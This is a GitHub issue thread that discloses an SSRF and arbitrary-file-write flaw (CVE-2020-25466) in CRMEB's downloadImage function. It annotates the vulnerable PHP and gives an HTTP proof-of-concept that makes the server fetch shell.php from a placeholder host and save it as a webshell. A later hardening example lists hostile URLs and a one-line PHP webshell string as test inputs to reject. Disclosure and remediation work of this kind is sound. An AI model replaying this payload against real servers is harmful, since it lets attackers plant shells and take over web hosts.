crmeb / CRMEB

🔥 CRMEB open-source mall: a free, open-source, multi-language e-commerce system built on the ThinkPHP 6 framework and licensed for commercial use. Includes a mini-program mall, H5 mall, official-account mall, PC mall and App, with support for distribution, group buying, bargaining, flash sales, coupons, points, member levels, mini-program live streaming and page DIY. Front end and back end are separated for easy secondary development, with detailed user documentation, API documentation, a data dictionary and secondary-development docs/video tutorials. Feedback and suggestions are welcome.
http://www.crmeb.com
Apache License 2.0
5.93k stars, 1.49k forks

An SSRF vulnerability leads to system access #22

Closed ViktorWkxStar closed 2 years ago

ViktorWkxStar commented 4 years ago

By looking at the source code, we found an SSRF vulnerability that can read arbitrary files on a remote or local server and save them to the web server. A malicious user can therefore download a malicious trojan file onto the web server and obtain the web server's permissions.

Analysis:

```php
public function downloadImage($url = '', $name = '', $type = 0, $timeout = 30, $w = 0, $h = 0)
{
    if (!strlen(trim($url))) return '';
    if (!strlen(trim($name))) {
        // Work out the name of the file to download.
        // Note: this extension check runs only when no $name was supplied;
        // a caller that passes its own $name skips it entirely.
        $downloadImageInfo = $this->getImageExtname($url);
        if (!$this->checkExtname($url, $downloadImageInfo['ext_name'])) {
            return JsonService::fail('文件后缀不合法'); // "invalid file extension"
        }
        $name = $downloadImageInfo['file_name'];
        if (!strlen(trim($name))) return '';
    }
```

The code above obtains the name of the file to download.

```php
    // Fetch the remote file
    if ($type) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        // With RETURNTRANSFER false, curl_exec() prints the body and returns a bool
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, false);
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // skip certificate verification
        if (stripos($url, "https://") !== FALSE) curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); // check the host name in the certificate
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('user-agent:' . $_SERVER['HTTP_USER_AGENT']));
        // Follow 301/302 redirects. As written, 'safe_mode' == 'Off' is false, so this calls
        // ini_get(false) and the condition is never true.
        if (ini_get('open_basedir') == '' && ini_get('safe_mode' == 'Off')) curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
        $content = curl_exec($ch);
        curl_close($ch);
    } else {
        try {
            ob_start();
            // readfile() accepts local paths and, with allow_url_fopen on, http:// and ftp:// URLs
            readfile($url);
            $content = ob_get_contents();
            ob_end_clean();
        } catch (\Exception $e) {
            return $e->getMessage();
        }
    }
```

Since the default value of the $type parameter is 0, the if branch is skipped and execution goes straight to the else branch. The readfile method reads the resource named by the $url parameter and writes it to the output buffer; $content then receives the content of the output buffer through ob_get_contents().

```php
    $size = strlen(trim($content));
    if (!$content || $size <= 2) return '图片流获取失败'; // "failed to get image stream"
    $date_dir = date('Y') . DS . date('m') . DS . date('d');
    $upload_type = sys_config('upload_type', 1);
    $upload = new Upload((int)$upload_type, [
        'accessKey'     => sys_config('accessKey'),
        'secretKey'     => sys_config('secretKey'),
        'uploadUrl'     => sys_config('uploadUrl'),
        'storageName'   => sys_config('storage_name'),
        'storageRegion' => sys_config('storage_region'),
    ]);
    // The fetched bytes are stored under the caller-supplied $name
    $info = $upload->to('attach/' . $date_dir)->validate()->stream($content, $name);
    if ($info === false) {
        return $upload->getError();
    }
    $imageInfo = $upload->getUploadInfo();
    $date['path'] = str_replace('\\', '/', $imageInfo['dir']);
    $date['name'] = $imageInfo['name'];
    $date['size'] = $imageInfo['size'];
    $date['mime'] = $imageInfo['type'];
    $date['image_type'] = $upload_type;
    $date['is_exists'] = false;
    return $date;
}
```

The rest of the code writes the contents of the fetched file to the web server.

Vulnerability reproduction:

1. http://localhost/admin/store._copy_taobao/downloadImage

PoC:

```http
POST http://localhost/admin/store._copy_taobao/downloadImage HTTP/1.1
Host: localhost
Content-Length: 77
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/admin/store.copy_taobao/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: clear_0.0.1=1; PHPSESSID=fa722bf27161fcf456f38e1f47750105; mapKey=%22%22; login_back_url=%22/cart%22
Connection: close

url=http://x.x.x.x/shell.php&name=shell.php
```
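For contrast with the `downloadImage()` flow analysed in the report above, here is a hardened version of the same fetch-and-store step. This is an added example, not CRMEB's code and not the reporter's: it allows only public http(s) targets, pins curl to the address it validated, refuses redirects, caps the body size while streaming, and names the stored file from the detected image type instead of the request's `name` parameter. The class, method names and the constructed test inputs are my own; PHP 7.4+ with ext-curl is assumed.

```php
<?php
declare(strict_types=1);
// Added example, not CRMEB's code: a hardened "fetch a remote image" helper. Assumes PHP 7.4+ with ext-curl.

final class SafeImageFetcher
{
    public const MAX_BYTES = 5 * 1024 * 1024;
    // Only store what the bytes prove to be an image; the extension comes from the bytes, not the request.
    private const ALLOWED = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif', 'image/webp' => 'webp'];

    /** Returns [host, port, ip] for a public http(s) URL and throws for anything else. */
    public static function validateUrl(string $url): array
    {
        $p = parse_url($url);
        if ($p === false || empty($p['scheme']) || empty($p['host'])) {
            throw new InvalidArgumentException('not an absolute URL'); // also catches /etc/passwd and file:///etc/passwd
        }
        $scheme = strtolower($p['scheme']);
        if ($scheme !== 'http' && $scheme !== 'https') {
            throw new InvalidArgumentException("scheme not allowed: $scheme"); // php://, ftp://, gopher://, data:
        }
        $host = strtolower(trim($p['host'], '[]'));
        $port = (int) ($p['port'] ?? ($scheme === 'https' ? 443 : 80));
        $ips = [];
        if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
            $ips[] = $host;
        } else {
            // dns_get_record() queries the resolver and ignores /etc/hosts: a name only present there
            // (e.g. "localhost") gets no records and is rejected below, so this fails closed.
            foreach (@dns_get_record($host, DNS_A | DNS_AAAA) ?: [] as $r) {
                $ips[] = $r['ip'] ?? $r['ipv6'];
            }
        }
        if ($ips === []) {
            throw new InvalidArgumentException("host does not resolve: $host");
        }
        foreach ($ips as $ip) {
            // Rejects 127/8, 10/8, 172.16/12, 192.168/16, 169.254/16 (cloud metadata), 0/8, ::1, fc00::/7, fe80::/10
            if (filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) === false) {
                throw new InvalidArgumentException("host resolves to a non-public address: $ip");
            }
        }
        return [$host, $port, $ips[0]];
    }

    /** Returns ['mime' => ..., 'ext' => ...] when the bytes are an allowed image, throws otherwise. */
    public static function checkImageBytes(string $body): array
    {
        if (strlen($body) > self::MAX_BYTES) {
            throw new RuntimeException('response too large');
        }
        $info = @getimagesizefromstring($body); // sniffs the image header; false for PHP source, HTML, etc.
        $mime = is_array($info) ? ($info['mime'] ?? '') : '';
        if (!isset(self::ALLOWED[$mime])) {
            throw new RuntimeException('response is not an allowed image type');
        }
        return ['mime' => $mime, 'ext' => self::ALLOWED[$mime]];
    }

    /** Fetches the URL (network required) and returns the bytes plus a server-chosen file name. */
    public static function fetch(string $url): array
    {
        [$host, $port, $ip] = self::validateUrl($url);
        $buf = '';
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
            CURLOPT_FOLLOWLOCATION => false, // a 302 to http://127.0.0.1/ would bypass validateUrl()
            CURLOPT_SSL_VERIFYPEER => true,
            CURLOPT_SSL_VERIFYHOST => 2,
            CURLOPT_TIMEOUT        => 15,
            // Pin the connection to the address that was validated (no DNS rebinding between check and use)
            CURLOPT_RESOLVE        => [sprintf('%s:%d:%s', $host, $port, strpos($ip, ':') !== false ? "[$ip]" : $ip)],
            // Enforce the size cap while streaming; returning -1 makes libcurl abort the transfer
            CURLOPT_WRITEFUNCTION  => static function ($ch, string $chunk) use (&$buf): int {
                $buf .= $chunk;
                return strlen($buf) > self::MAX_BYTES ? -1 : strlen($chunk);
            },
        ]);
        $ok = curl_exec($ch);
        $status = (int) curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
        curl_close($ch);
        if ($ok === false || $status !== 200) {
            throw new RuntimeException("fetch failed (HTTP $status)");
        }
        $img = self::checkImageBytes($buf);
        // Never reuse the caller-supplied name: no path components, no attacker-chosen .php extension
        return ['name' => bin2hex(random_bytes(16)) . '.' . $img['ext'], 'mime' => $img['mime'], 'bytes' => $buf];
    }
}

// Offline self-check on constructed inputs (IP literals, so no DNS lookup is needed).
if (PHP_SAPI === 'cli' && isset($argv[0]) && realpath($argv[0]) === __FILE__) {
    foreach (['http://127.0.0.1/shell.php', 'http://169.254.169.254/latest/', 'http://[::1]/',
              'file:///etc/passwd', 'php://filter/resource=/etc/passwd', '/etc/passwd'] as $u) {
        try { SafeImageFetcher::validateUrl($u); echo "ACCEPTED (bug): $u\n"; }
        catch (InvalidArgumentException $e) { echo "rejected: $u ({$e->getMessage()})\n"; }
    }
    $gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAICRAEAOw=='); // constructed 1x1 GIF
    echo SafeImageFetcher::checkImageBytes($gif)['ext'], "\n";
    try { SafeImageFetcher::checkImageBytes('<?php system($_GET["c"]); ?>'); }
    catch (RuntimeException $e) { echo "rejected: {$e->getMessage()}\n"; }
}
```

Run it as a CLI script to see the self-check: every URL from the PoC pattern (loopback, link-local metadata address, IPv6 loopback, `file://`, `php://`, bare path) is rejected, the constructed GIF passes the byte check, and a PHP webshell body is refused regardless of what `name` the caller asked for. The storage step that follows `fetch()` should write `bytes` under the returned `name` into a directory the web server serves as static files only, never executes.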

NicoleG25 commented 3 years ago

@FeiLiao-9 Hello, has this issue been fixed? Please note that this vulnerability has been assigned CVE-2020-25466. Thanks in advance.

ViktorWkxStar commented 3 years ago

Fixed.

NicoleG25 commented 3 years ago

@ViktorWkxStar Can you point me to the fix?

ViktorWkxStar commented 3 years ago

A new version was released that removed that remote download feature.

NicoleG25 commented 3 years ago

Do you have a commit?

Thanks in advance!

@ViktorWkxStar

ViktorWkxStar commented 3 years ago

No.